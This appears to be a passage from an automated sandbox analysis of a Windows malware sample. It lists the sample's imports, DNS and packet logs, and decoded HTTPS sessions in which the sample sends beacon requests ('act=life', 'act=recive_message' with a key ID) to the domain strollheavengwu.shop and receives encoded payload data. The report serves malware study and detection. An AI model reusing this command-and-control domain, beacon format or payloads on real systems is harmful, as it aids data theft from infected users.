                                                  KERNEL32.dllLocalCompact, GetUserDefaultLCID, AddConsoleAliasW, CreateHardLinkA, GetTickCount, GetWindowsDirectoryA, EnumTimeFormatsW, FindResourceExA, GetVolumeInformationA, LoadLibraryW, ReadConsoleInputA, CopyFileW, WriteConsoleW, GetCompressedFileSizeA, GetTempPathW, SetThreadLocale, GetLastError, SetLastError, GetProcAddress, GetLocaleInfoA, CreateTimerQueueTimer, SetStdHandle, SetFileAttributesA, WriteConsoleA, InterlockedExchangeAdd, LocalAlloc, SetCalendarInfoW, GetExitCodeThread, RemoveDirectoryW, AddAtomA, GlobalFindAtomW, GetModuleFileNameA, GetOEMCP, GlobalUnWire, LoadLibraryExA, AddConsoleAliasA, OutputDebugStringW, GetComputerNameA, FindFirstChangeNotificationW, GetSystemDefaultLangID, FlushFileBuffers, GetConsoleMode, HeapFree, EncodePointer, DecodePointer, IsProcessorFeaturePresent, GetCommandLineA, RaiseException, RtlUnwind, IsValidCodePage, GetACP, GetCPInfo, GetCurrentThreadId, IsDebuggerPresent, GetProcessHeap, ExitProcess, GetModuleHandleExW, MultiByteToWideChar, WideCharToMultiByte, HeapSize, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, GetFileType, DeleteCriticalSection, GetStartupInfoW, CloseHandle, HeapAlloc, WriteFile, GetModuleFileNameW, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, GetEnvironmentStringsW, FreeEnvironmentStringsW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, InitializeCriticalSectionAndSpinCount, Sleep, GetCurrentProcess, TerminateProcess, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetModuleHandleW, GetStringTypeW, LoadLibraryExW, HeapReAlloc, ReadFile, SetFilePointerEx, LCMapStringW, GetConsoleCP, CreateFileW
                                                  USER32.dllGetMenuItemID
                                                  GDI32.dllGetCharacterPlacementW
                                                  ADVAPI32.dllDeregisterEventSource
                                                  WINHTTP.dllWinHttpConnect
                                                  Language of compilation systemCountry where language is spokenMap
                                                  RomanianRomania
                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Apr 20, 2024 22:06:58.107923985 CEST49730443192.168.2.4104.21.15.198
                                                  Apr 20, 2024 22:06:58.107964039 CEST44349730104.21.15.198192.168.2.4
                                                  Apr 20, 2024 22:06:58.108043909 CEST49730443192.168.2.4104.21.15.198
                                                  Apr 20, 2024 22:06:58.132740974 CEST49730443192.168.2.4104.21.15.198
                                                  Apr 20, 2024 22:06:58.132783890 CEST44349730104.21.15.198192.168.2.4
                                                  Apr 20, 2024 22:06:58.365586042 CEST44349730104.21.15.198192.168.2.4
                                                  Apr 20, 2024 22:06:58.365669012 CEST49730443192.168.2.4104.21.15.198
                                                  Apr 20, 2024 22:06:58.369517088 CEST49730443192.168.2.4104.21.15.198
                                                  Apr 20, 2024 22:06:58.369530916 CEST44349730104.21.15.198192.168.2.4
                                                  Apr 20, 2024 22:06:58.369940042 CEST44349730104.21.15.198192.168.2.4
                                                  Apr 20, 2024 22:06:58.421324968 CEST49730443192.168.2.4104.21.15.198
                                                  Apr 20, 2024 22:06:58.421350002 CEST49730443192.168.2.4104.21.15.198
                                                  Apr 20, 2024 22:06:58.421530008 CEST44349730104.21.15.198192.168.2.4
                                                  Apr 20, 2024 22:06:58.903470993 CEST44349730104.21.15.198192.168.2.4
                                                  Apr 20, 2024 22:06:58.903619051 CEST44349730104.21.15.198192.168.2.4
                                                  Apr 20, 2024 22:06:58.903981924 CEST49730443192.168.2.4104.21.15.198
                                                  Apr 20, 2024 22:06:58.906050920 CEST49730443192.168.2.4104.21.15.198
                                                  Apr 20, 2024 22:06:58.906071901 CEST44349730104.21.15.198192.168.2.4
                                                  Apr 20, 2024 22:06:58.910775900 CEST49731443192.168.2.4104.21.15.198
                                                  Apr 20, 2024 22:06:58.910876036 CEST44349731104.21.15.198192.168.2.4
                                                  Apr 20, 2024 22:06:58.910980940 CEST49731443192.168.2.4104.21.15.198
                                                  Apr 20, 2024 22:06:58.911284924 CEST49731443192.168.2.4104.21.15.198
                                                  Apr 20, 2024 22:06:58.911309958 CEST44349731104.21.15.198192.168.2.4
                                                  Apr 20, 2024 22:06:59.136548042 CEST44349731104.21.15.198192.168.2.4
                                                  Apr 20, 2024 22:06:59.136770964 CEST49731443192.168.2.4104.21.15.198
                                                  Apr 20, 2024 22:06:59.138067961 CEST49731443192.168.2.4104.21.15.198
                                                  Apr 20, 2024 22:06:59.138087034 CEST44349731104.21.15.198192.168.2.4
                                                  Apr 20, 2024 22:06:59.138588905 CEST44349731104.21.15.198192.168.2.4
                                                  Apr 20, 2024 22:06:59.139751911 CEST49731443192.168.2.4104.21.15.198
                                                  Apr 20, 2024 22:06:59.139786005 CEST49731443192.168.2.4104.21.15.198
                                                  Apr 20, 2024 22:06:59.139853001 CEST44349731104.21.15.198192.168.2.4
                                                  Apr 20, 2024 22:06:59.689630032 CEST44349731104.21.15.198192.168.2.4
                                                  Apr 20, 2024 22:06:59.689778090 CEST44349731104.21.15.198192.168.2.4
                                                  Apr 20, 2024 22:06:59.689883947 CEST44349731104.21.15.198192.168.2.4
                                                  Apr 20, 2024 22:06:59.689943075 CEST49731443192.168.2.4104.21.15.198
                                                  Apr 20, 2024 22:06:59.689970016 CEST44349731104.21.15.198192.168.2.4
                                                  Apr 20, 2024 22:06:59.689996004 CEST44349731104.21.15.198192.168.2.4
                                                  Apr 20, 2024 22:06:59.690016031 CEST49731443192.168.2.4104.21.15.198
                                                  Apr 20, 2024 22:06:59.690134048 CEST44349731104.21.15.198192.168.2.4
                                                  Apr 20, 2024 22:06:59.690185070 CEST49731443192.168.2.4104.21.15.198
                                                  Apr 20, 2024 22:06:59.690216064 CEST44349731104.21.15.198192.168.2.4
                                                  Apr 20, 2024 22:06:59.690293074 CEST44349731104.21.15.198192.168.2.4
                                                  Apr 20, 2024 22:06:59.690342903 CEST49731443192.168.2.4104.21.15.198
                                                  Apr 20, 2024 22:06:59.690356970 CEST44349731104.21.15.198192.168.2.4
                                                  Apr 20, 2024 22:06:59.690435886 CEST44349731104.21.15.198192.168.2.4
                                                  Apr 20, 2024 22:06:59.690485001 CEST49731443192.168.2.4104.21.15.198
                                                  Apr 20, 2024 22:06:59.690495014 CEST44349731104.21.15.198192.168.2.4
                                                  Apr 20, 2024 22:06:59.690568924 CEST44349731104.21.15.198192.168.2.4
                                                  Apr 20, 2024 22:06:59.690612078 CEST49731443192.168.2.4104.21.15.198
                                                  Apr 20, 2024 22:06:59.690622091 CEST44349731104.21.15.198192.168.2.4
                                                  Apr 20, 2024 22:06:59.690929890 CEST44349731104.21.15.198192.168.2.4
                                                  Apr 20, 2024 22:06:59.690980911 CEST49731443192.168.2.4104.21.15.198
                                                  Apr 20, 2024 22:06:59.692045927 CEST49731443192.168.2.4104.21.15.198
                                                  Apr 20, 2024 22:06:59.692080975 CEST44349731104.21.15.198192.168.2.4
                                                  Apr 20, 2024 22:06:59.692121983 CEST49731443192.168.2.4104.21.15.198
                                                  Apr 20, 2024 22:06:59.692136049 CEST44349731104.21.15.198192.168.2.4
                                                  Apr 20, 2024 22:06:59.809972048 CEST49732443192.168.2.4104.21.15.198
                                                  Apr 20, 2024 22:06:59.810056925 CEST44349732104.21.15.198192.168.2.4
                                                  Apr 20, 2024 22:06:59.810142040 CEST49732443192.168.2.4104.21.15.198
                                                  Apr 20, 2024 22:06:59.810508966 CEST49732443192.168.2.4104.21.15.198
                                                  Apr 20, 2024 22:06:59.810543060 CEST44349732104.21.15.198192.168.2.4
                                                  Apr 20, 2024 22:07:00.036710024 CEST44349732104.21.15.198192.168.2.4
                                                  Apr 20, 2024 22:07:00.037024021 CEST49732443192.168.2.4104.21.15.198
                                                  Apr 20, 2024 22:07:00.038223028 CEST49732443192.168.2.4104.21.15.198
                                                  Apr 20, 2024 22:07:00.038252115 CEST44349732104.21.15.198192.168.2.4
                                                  Apr 20, 2024 22:07:00.038760900 CEST44349732104.21.15.198192.168.2.4
                                                  Apr 20, 2024 22:07:00.040020943 CEST49732443192.168.2.4104.21.15.198
                                                  Apr 20, 2024 22:07:00.040177107 CEST49732443192.168.2.4104.21.15.198
                                                  Apr 20, 2024 22:07:00.040222883 CEST44349732104.21.15.198192.168.2.4
                                                  Apr 20, 2024 22:07:00.040306091 CEST49732443192.168.2.4104.21.15.198
                                                  Apr 20, 2024 22:07:00.040322065 CEST44349732104.21.15.198192.168.2.4
                                                  Apr 20, 2024 22:07:00.578377008 CEST44349732104.21.15.198192.168.2.4
                                                  Apr 20, 2024 22:07:00.578699112 CEST44349732104.21.15.198192.168.2.4
                                                  Apr 20, 2024 22:07:00.578797102 CEST49732443192.168.2.4104.21.15.198
                                                  Apr 20, 2024 22:07:00.578864098 CEST49732443192.168.2.4104.21.15.198
                                                  Apr 20, 2024 22:07:00.578903913 CEST44349732104.21.15.198192.168.2.4
                                                  Apr 20, 2024 22:07:00.681066990 CEST49733443192.168.2.4104.21.15.198
                                                  Apr 20, 2024 22:07:00.681135893 CEST44349733104.21.15.198192.168.2.4
                                                  Apr 20, 2024 22:07:00.681247950 CEST49733443192.168.2.4104.21.15.198
                                                  Apr 20, 2024 22:07:00.681675911 CEST49733443192.168.2.4104.21.15.198
                                                  Apr 20, 2024 22:07:00.681705952 CEST44349733104.21.15.198192.168.2.4
                                                  Apr 20, 2024 22:07:00.906430960 CEST44349733104.21.15.198192.168.2.4
                                                  Apr 20, 2024 22:07:00.906666994 CEST49733443192.168.2.4104.21.15.198
                                                  Apr 20, 2024 22:07:00.908499002 CEST49733443192.168.2.4104.21.15.198
                                                  Apr 20, 2024 22:07:00.908516884 CEST44349733104.21.15.198192.168.2.4
                                                  Apr 20, 2024 22:07:00.909048080 CEST44349733104.21.15.198192.168.2.4
                                                  Apr 20, 2024 22:07:00.910222054 CEST49733443192.168.2.4104.21.15.198
                                                  Apr 20, 2024 22:07:00.910375118 CEST49733443192.168.2.4104.21.15.198
                                                  Apr 20, 2024 22:07:00.910418987 CEST44349733104.21.15.198192.168.2.4
                                                  Apr 20, 2024 22:07:01.438627005 CEST44349733104.21.15.198192.168.2.4
                                                  Apr 20, 2024 22:07:01.438898087 CEST44349733104.21.15.198192.168.2.4
                                                  Apr 20, 2024 22:07:01.439039946 CEST49733443192.168.2.4104.21.15.198
                                                  Apr 20, 2024 22:07:01.442152977 CEST49733443192.168.2.4104.21.15.198
                                                  Apr 20, 2024 22:07:01.442205906 CEST44349733104.21.15.198192.168.2.4
                                                  Apr 20, 2024 22:07:01.610970020 CEST49734443192.168.2.4104.21.15.198
                                                  Apr 20, 2024 22:07:01.611012936 CEST44349734104.21.15.198192.168.2.4
                                                  Apr 20, 2024 22:07:01.611207962 CEST49734443192.168.2.4104.21.15.198
                                                  Apr 20, 2024 22:07:01.611701012 CEST49734443192.168.2.4104.21.15.198
                                                  Apr 20, 2024 22:07:01.611715078 CEST44349734104.21.15.198192.168.2.4
                                                  Apr 20, 2024 22:07:01.836942911 CEST44349734104.21.15.198192.168.2.4
                                                  Apr 20, 2024 22:07:01.837135077 CEST49734443192.168.2.4104.21.15.198
                                                  Apr 20, 2024 22:07:01.838803053 CEST49734443192.168.2.4104.21.15.198
                                                  Apr 20, 2024 22:07:01.838809967 CEST44349734104.21.15.198192.168.2.4
                                                  Apr 20, 2024 22:07:01.839128017 CEST44349734104.21.15.198192.168.2.4
                                                  Apr 20, 2024 22:07:01.840225935 CEST49734443192.168.2.4104.21.15.198
                                                  Apr 20, 2024 22:07:01.840372086 CEST49734443192.168.2.4104.21.15.198
                                                  Apr 20, 2024 22:07:01.840408087 CEST44349734104.21.15.198192.168.2.4
                                                  Apr 20, 2024 22:07:01.840503931 CEST49734443192.168.2.4104.21.15.198
                                                  Apr 20, 2024 22:07:01.840512037 CEST44349734104.21.15.198192.168.2.4
                                                  Apr 20, 2024 22:07:02.445250988 CEST44349734104.21.15.198192.168.2.4
                                                  Apr 20, 2024 22:07:02.445508957 CEST44349734104.21.15.198192.168.2.4
                                                  Apr 20, 2024 22:07:02.445600033 CEST49734443192.168.2.4104.21.15.198
                                                  Apr 20, 2024 22:07:02.452986956 CEST49734443192.168.2.4104.21.15.198
                                                  Apr 20, 2024 22:07:02.453011990 CEST44349734104.21.15.198192.168.2.4
                                                  Apr 20, 2024 22:07:02.659068108 CEST49735443192.168.2.4104.21.15.198
                                                  Apr 20, 2024 22:07:02.659142017 CEST44349735104.21.15.198192.168.2.4
                                                  Apr 20, 2024 22:07:02.659226894 CEST49735443192.168.2.4104.21.15.198
                                                  Apr 20, 2024 22:07:02.659588099 CEST49735443192.168.2.4104.21.15.198
                                                  Apr 20, 2024 22:07:02.659632921 CEST44349735104.21.15.198192.168.2.4
                                                  Apr 20, 2024 22:07:02.885277987 CEST44349735104.21.15.198192.168.2.4
                                                  Apr 20, 2024 22:07:02.885404110 CEST49735443192.168.2.4104.21.15.198
                                                  Apr 20, 2024 22:07:02.886605024 CEST49735443192.168.2.4104.21.15.198
                                                  Apr 20, 2024 22:07:02.886621952 CEST44349735104.21.15.198192.168.2.4
                                                  Apr 20, 2024 22:07:02.887118101 CEST44349735104.21.15.198192.168.2.4
                                                  Apr 20, 2024 22:07:02.888267994 CEST49735443192.168.2.4104.21.15.198
                                                  Apr 20, 2024 22:07:02.888366938 CEST49735443192.168.2.4104.21.15.198
                                                  Apr 20, 2024 22:07:02.888422966 CEST44349735104.21.15.198192.168.2.4
                                                  Apr 20, 2024 22:07:03.409410000 CEST44349735104.21.15.198192.168.2.4
                                                  Apr 20, 2024 22:07:03.409676075 CEST49735443192.168.2.4104.21.15.198
                                                  Apr 20, 2024 22:07:03.409699917 CEST44349735104.21.15.198192.168.2.4
                                                  Apr 20, 2024 22:07:03.409758091 CEST49735443192.168.2.4104.21.15.198
                                                  Apr 20, 2024 22:07:03.492305040 CEST49736443192.168.2.4104.21.15.198
                                                  Apr 20, 2024 22:07:03.492340088 CEST44349736104.21.15.198192.168.2.4
                                                  Apr 20, 2024 22:07:03.492428064 CEST49736443192.168.2.4104.21.15.198
                                                  Apr 20, 2024 22:07:03.492717028 CEST49736443192.168.2.4104.21.15.198
                                                  Apr 20, 2024 22:07:03.492732048 CEST44349736104.21.15.198192.168.2.4
                                                  Apr 20, 2024 22:07:03.723784924 CEST44349736104.21.15.198192.168.2.4
                                                  Apr 20, 2024 22:07:03.723861933 CEST49736443192.168.2.4104.21.15.198
                                                  Apr 20, 2024 22:07:03.725244999 CEST49736443192.168.2.4104.21.15.198
                                                  Apr 20, 2024 22:07:03.725255013 CEST44349736104.21.15.198192.168.2.4
                                                  Apr 20, 2024 22:07:03.725745916 CEST44349736104.21.15.198192.168.2.4
                                                  Apr 20, 2024 22:07:03.726933002 CEST49736443192.168.2.4104.21.15.198
                                                  Apr 20, 2024 22:07:03.727018118 CEST49736443192.168.2.4104.21.15.198
                                                  Apr 20, 2024 22:07:03.727021933 CEST44349736104.21.15.198192.168.2.4
                                                  Apr 20, 2024 22:07:04.248038054 CEST44349736104.21.15.198192.168.2.4
                                                  Apr 20, 2024 22:07:04.248320103 CEST44349736104.21.15.198192.168.2.4
                                                  Apr 20, 2024 22:07:04.248613119 CEST49736443192.168.2.4104.21.15.198
                                                  Apr 20, 2024 22:07:04.248613119 CEST49736443192.168.2.4104.21.15.198
                                                  Apr 20, 2024 22:07:04.673290014 CEST49737443192.168.2.4104.21.15.198
                                                  Apr 20, 2024 22:07:04.673394918 CEST44349737104.21.15.198192.168.2.4
                                                  Apr 20, 2024 22:07:04.673531055 CEST49737443192.168.2.4104.21.15.198
                                                  Apr 20, 2024 22:07:04.673974991 CEST49737443192.168.2.4104.21.15.198
                                                  Apr 20, 2024 22:07:04.674010038 CEST44349737104.21.15.198192.168.2.4
                                                  Apr 20, 2024 22:07:04.903810024 CEST44349737104.21.15.198192.168.2.4
                                                  Apr 20, 2024 22:07:04.903893948 CEST49737443192.168.2.4104.21.15.198
                                                  Apr 20, 2024 22:07:04.905314922 CEST49737443192.168.2.4104.21.15.198
                                                  Apr 20, 2024 22:07:04.905333996 CEST44349737104.21.15.198192.168.2.4
                                                  Apr 20, 2024 22:07:04.905782938 CEST44349737104.21.15.198192.168.2.4
                                                  Apr 20, 2024 22:07:04.906878948 CEST49737443192.168.2.4104.21.15.198
                                                  Apr 20, 2024 22:07:04.907520056 CEST49737443192.168.2.4104.21.15.198
                                                  Apr 20, 2024 22:07:04.907561064 CEST44349737104.21.15.198192.168.2.4
                                                  Apr 20, 2024 22:07:04.907691956 CEST49737443192.168.2.4104.21.15.198
                                                  Apr 20, 2024 22:07:04.907728910 CEST44349737104.21.15.198192.168.2.4
                                                  Apr 20, 2024 22:07:04.907860994 CEST49737443192.168.2.4104.21.15.198
                                                  Apr 20, 2024 22:07:04.907984018 CEST44349737104.21.15.198192.168.2.4
                                                  Apr 20, 2024 22:07:04.908139944 CEST49737443192.168.2.4104.21.15.198
                                                  Apr 20, 2024 22:07:04.908169985 CEST44349737104.21.15.198192.168.2.4
                                                  Apr 20, 2024 22:07:04.908338070 CEST49737443192.168.2.4104.21.15.198
                                                  Apr 20, 2024 22:07:04.908366919 CEST44349737104.21.15.198192.168.2.4
                                                  Apr 20, 2024 22:07:04.908564091 CEST49737443192.168.2.4104.21.15.198
                                                  Apr 20, 2024 22:07:04.908597946 CEST49737443192.168.2.4104.21.15.198
                                                  Apr 20, 2024 22:07:04.908685923 CEST44349737104.21.15.198192.168.2.4
                                                  Apr 20, 2024 22:07:04.908874035 CEST49737443192.168.2.4104.21.15.198
                                                  Apr 20, 2024 22:07:04.908921003 CEST49737443192.168.2.4104.21.15.198
                                                  Apr 20, 2024 22:07:04.909003973 CEST44349737104.21.15.198192.168.2.4
                                                  Apr 20, 2024 22:07:04.909183025 CEST49737443192.168.2.4104.21.15.198
                                                  Apr 20, 2024 22:07:04.909240961 CEST49737443192.168.2.4104.21.15.198
                                                  Apr 20, 2024 22:07:04.909256935 CEST49737443192.168.2.4104.21.15.198
                                                  Apr 20, 2024 22:07:04.952143908 CEST44349737104.21.15.198192.168.2.4
                                                  Apr 20, 2024 22:07:04.952388048 CEST49737443192.168.2.4104.21.15.198
                                                  Apr 20, 2024 22:07:04.952442884 CEST49737443192.168.2.4104.21.15.198
                                                  Apr 20, 2024 22:07:04.996151924 CEST44349737104.21.15.198192.168.2.4
                                                  Apr 20, 2024 22:07:04.996288061 CEST49737443192.168.2.4104.21.15.198
                                                  Apr 20, 2024 22:07:05.040153980 CEST44349737104.21.15.198192.168.2.4
                                                  Apr 20, 2024 22:07:05.118247032 CEST44349737104.21.15.198192.168.2.4
                                                  Apr 20, 2024 22:07:05.118390083 CEST49737443192.168.2.4104.21.15.198
                                                  Apr 20, 2024 22:07:05.118491888 CEST44349737104.21.15.198192.168.2.4
                                                  Apr 20, 2024 22:07:05.159781933 CEST44349737104.21.15.198192.168.2.4
                                                  Apr 20, 2024 22:07:05.224684000 CEST44349737104.21.15.198192.168.2.4
                                                  Apr 20, 2024 22:07:06.482014894 CEST44349737104.21.15.198192.168.2.4
                                                  Apr 20, 2024 22:07:06.482297897 CEST44349737104.21.15.198192.168.2.4
                                                  Apr 20, 2024 22:07:06.482348919 CEST49737443192.168.2.4104.21.15.198
                                                  Apr 20, 2024 22:07:06.482404947 CEST49737443192.168.2.4104.21.15.198
                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Apr 20, 2024 22:06:57.963877916 CEST5967453192.168.2.41.1.1.1
                                                  Apr 20, 2024 22:06:58.102309942 CEST53596741.1.1.1192.168.2.4
                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                  Apr 20, 2024 22:06:57.963877916 CEST192.168.2.41.1.1.10x1decStandard query (0)strollheavengwu.shopA (IP address)IN (0x0001)false
                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                  Apr 20, 2024 22:06:58.102309942 CEST1.1.1.1192.168.2.40x1decNo error (0)strollheavengwu.shop104.21.15.198A (IP address)IN (0x0001)false
                                                  Apr 20, 2024 22:06:58.102309942 CEST1.1.1.1192.168.2.40x1decNo error (0)strollheavengwu.shop172.67.163.209A (IP address)IN (0x0001)false
                                                  • strollheavengwu.shop
                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  0192.168.2.449730104.21.15.1984437396C:\Users\user\Desktop\LwnI84BBtb.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-04-20 20:06:58 UTC267OUTPOST /api HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                  Content-Length: 8
                                                  Host: strollheavengwu.shop
                                                  2024-04-20 20:06:58 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                  Data Ascii: act=life
                                                  2024-04-20 20:06:58 UTC808INHTTP/1.1 200 OK
                                                  Date: Sat, 20 Apr 2024 20:06:58 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Set-Cookie: PHPSESSID=nosdrffc2toj70a75hs81v1jfd; expires=Wed, 14-Aug-2024 13:53:37 GMT; Max-Age=9999999; path=/
                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                  Pragma: no-cache
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MFsWPb%2BgZzPPJSR6Uia9g0Wlv9G4M4NHKMtqxPmXvnz3W7oa0k%2B7TXddjwuMMqYKizD9AiGILyk5YAqDfsDovnqxjeh%2B8ZjhZln6Skf34qB5PiPL6l8qda4dkWV0TQgeiGgBCltH2g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8777c207ea701399-ATL
                                                  alt-svc: h3=":443"; ma=86400
                                                  2024-04-20 20:06:58 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                  Data Ascii: 2ok
                                                  2024-04-20 20:06:58 UTC5INData Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  1192.168.2.449731104.21.15.1984437396C:\Users\user\Desktop\LwnI84BBtb.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-04-20 20:06:59 UTC268OUTPOST /api HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                  Content-Length: 52
                                                  Host: strollheavengwu.shop
                                                  2024-04-20 20:06:59 UTC52OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 50 36 4d 6b 30 4d 2d 2d 6b 65 79 26 6a 3d 64 65 66 61 75 6c 74
                                                  Data Ascii: act=recive_message&ver=4.0&lid=P6Mk0M--key&j=default
                                                  2024-04-20 20:06:59 UTC804INHTTP/1.1 200 OK
                                                  Date: Sat, 20 Apr 2024 20:06:59 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Set-Cookie: PHPSESSID=fsmoor00oprdpju4obtfrv73c9; expires=Wed, 14-Aug-2024 13:53:38 GMT; Max-Age=9999999; path=/
                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                  Pragma: no-cache
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=imXlGE0adeNZrKUgWroLp9BiwoXVy3kWw5ZuDi4kOcjcW03RNMrZeah08PSjyG7tSU1BKNEp940g1DORTiuAv9sR4xndnHYqr0Po4t%2BsFaUVY3GohoiGuCOr7PH05ncSRjQvKGYE5A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8777c20cccdd4590-ATL
                                                  alt-svc: h3=":443"; ma=86400
                                                  2024-04-20 20:06:59 UTC565INData Raw: 31 35 66 33 0d 0a 71 6e 79 50 69 44 57 4c 6f 37 42 63 74 59 30 35 65 45 4b 35 44 78 4c 31 71 6e 6d 37 5a 33 7a 6f 77 6a 41 45 33 66 54 38 55 4f 76 52 64 6f 61 71 51 36 6d 5a 6b 47 69 5a 68 7a 42 61 4d 64 77 74 4b 4e 58 65 43 38 34 43 55 4f 4c 4c 45 6d 57 35 31 73 5a 77 6a 63 73 51 2f 4f 30 5a 67 61 71 53 4d 63 32 76 41 31 67 5a 73 77 5a 70 2f 36 4e 77 6d 51 49 53 79 76 67 51 4a 71 71 52 6e 6a 57 54 33 68 6e 68 2b 31 7a 6b 7a 66 41 78 30 50 6c 59 46 53 50 4b 5a 44 79 63 78 56 75 58 62 58 58 68 34 46 56 2b 2f 38 37 63 63 71 62 50 43 4f 37 46 56 50 6a 49 6b 6e 43 2f 68 44 42 61 4a 38 30 74 4b 4e 57 49 4a 5a 6b 58 48 5a 71 6a 58 58 65 42 31 73 59 72 74 34 67 56 2b 2b 31 48 36 74 66 5a 4d 39 76 2b 5a 56 70 34 6a 7a 38 69 78 5a 70 4a 78 6b 56 32 34 62 38 36 44
                                                  Data Ascii: 15f3qnyPiDWLo7BctY05eEK5DxL1qnm7Z3zowjAE3fT8UOvRdoaqQ6mZkGiZhzBaMdwtKNXeC84CUOLLEmW51sZwjcsQ/O0ZgaqSMc2vA1gZswZp/6NwmQISyvgQJqqRnjWT3hnh+1zkzfAx0PlYFSPKZDycxVuXbXXh4FV+/87ccqbPCO7FVPjIknC/hDBaJ80tKNWIJZkXHZqjXXeB1sYrt4gV++1H6tfZM9v+ZVp4jz8ixZpJxkV24b86D
                                                  2024-04-20 20:06:59 UTC1369INData Raw: 6f 46 2b 2f 50 30 7a 50 58 2f 56 4d 52 4b 39 35 2f 65 35 37 46 46 74 6b 49 46 49 57 6a 55 6d 47 31 6e 4a 45 34 6a 63 55 54 36 2b 70 58 71 59 2b 36 56 62 79 76 58 41 4a 67 67 79 38 77 74 4d 30 4c 33 67 6b 49 79 4a 6f 53 44 74 53 4a 30 46 6e 4c 69 6e 61 47 38 7a 2b 43 71 70 49 35 32 36 38 44 57 47 44 54 61 48 4f 55 77 78 54 61 44 52 57 59 6f 45 42 67 73 70 4f 4d 4e 49 7a 47 46 4f 37 34 58 65 66 48 30 54 66 63 35 6c 34 64 4a 4a 73 6a 47 50 79 6a 57 39 34 64 58 74 4c 69 45 6b 65 79 6e 5a 49 34 6e 73 68 65 68 59 46 49 70 36 6d 35 4a 37 2b 45 4d 46 6f 6e 31 79 30 6f 31 59 67 66 32 41 45 66 6a 71 35 63 59 72 4f 51 6b 44 2b 47 7a 68 54 74 37 56 33 68 79 64 4d 7a 33 4f 42 62 48 79 33 66 61 33 79 57 7a 56 75 58 62 58 58 68 34 46 56 2b 2f 38 37 63 63 71 66 50 48 66
                                                  Data Ascii: oF+/P0zPX/VMRK95/e57FFtkIFIWjUmG1nJE4jcUT6+pXqY+6VbyvXAJggy8wtM0L3gkIyJoSDtSJ0FnLinaG8z+CqpI5268DWGDTaHOUwxTaDRWYoEBgspOMNIzGFO74XefH0Tfc5l4dJJsjGPyjW94dXtLiEkeynZI4nshehYFIp6m5J7+EMFon1y0o1Ygf2AEfjq5cYrOQkD+GzhTt7V3hydMz3OBbHy3fa3yWzVuXbXXh4FV+/87ccqfPHf
                                                  2024-04-20 20:06:59 UTC1369INData Raw: 78 74 73 33 33 65 35 56 46 53 76 58 61 47 4b 63 78 78 50 57 42 42 4f 48 71 31 5a 6d 2f 39 6a 32 57 65 4b 49 47 66 57 71 44 36 75 42 38 7a 50 59 2f 56 67 4c 59 75 35 75 66 70 6e 50 44 5a 6c 74 64 5a 58 75 4f 67 32 6d 2f 76 56 5a 79 63 38 53 72 62 49 56 71 63 44 65 4d 74 62 67 58 52 41 6f 32 47 78 69 6e 73 63 54 31 67 77 66 69 61 52 54 62 4b 32 45 6e 6a 36 62 78 42 54 72 35 56 72 6c 67 5a 78 57 76 49 51 62 48 54 69 62 4e 54 4c 58 34 68 6a 4e 42 68 54 49 6c 56 46 6f 73 5a 47 49 63 75 47 6a 41 61 4f 43 50 50 43 70 75 56 57 58 36 46 64 61 65 4a 6b 74 66 5a 62 41 48 63 73 4b 45 34 6d 75 58 47 6d 36 6d 5a 59 79 69 63 55 62 36 65 46 63 36 73 7a 57 4c 4e 33 76 55 78 38 68 30 57 63 77 32 61 42 77 73 6b 55 5a 6b 75 41 4b 4a 50 2b 6e 69 54 6e 4c 2f 52 33 6a 35 46 44
                                                  Data Ascii: xts33e5VFSvXaGKcxxPWBBOHq1Zm/9j2WeKIGfWqD6uB8zPY/VgLYu5ufpnPDZltdZXuOg2m/vVZyc8SrbIVqcDeMtbgXRAo2GxinscT1gwfiaRTbK2Enj6bxBTr5VrlgZxWvIQbHTibNTLX4hjNBhTIlVFosZGIcuGjAaOCPPCpuVWX6FdaeJktfZbAHcsKE4muXGm6mZYyicUb6eFc6szWLN3vUx8h0Wcw2aBwskUZkuAKJP+niTnL/R3j5FD
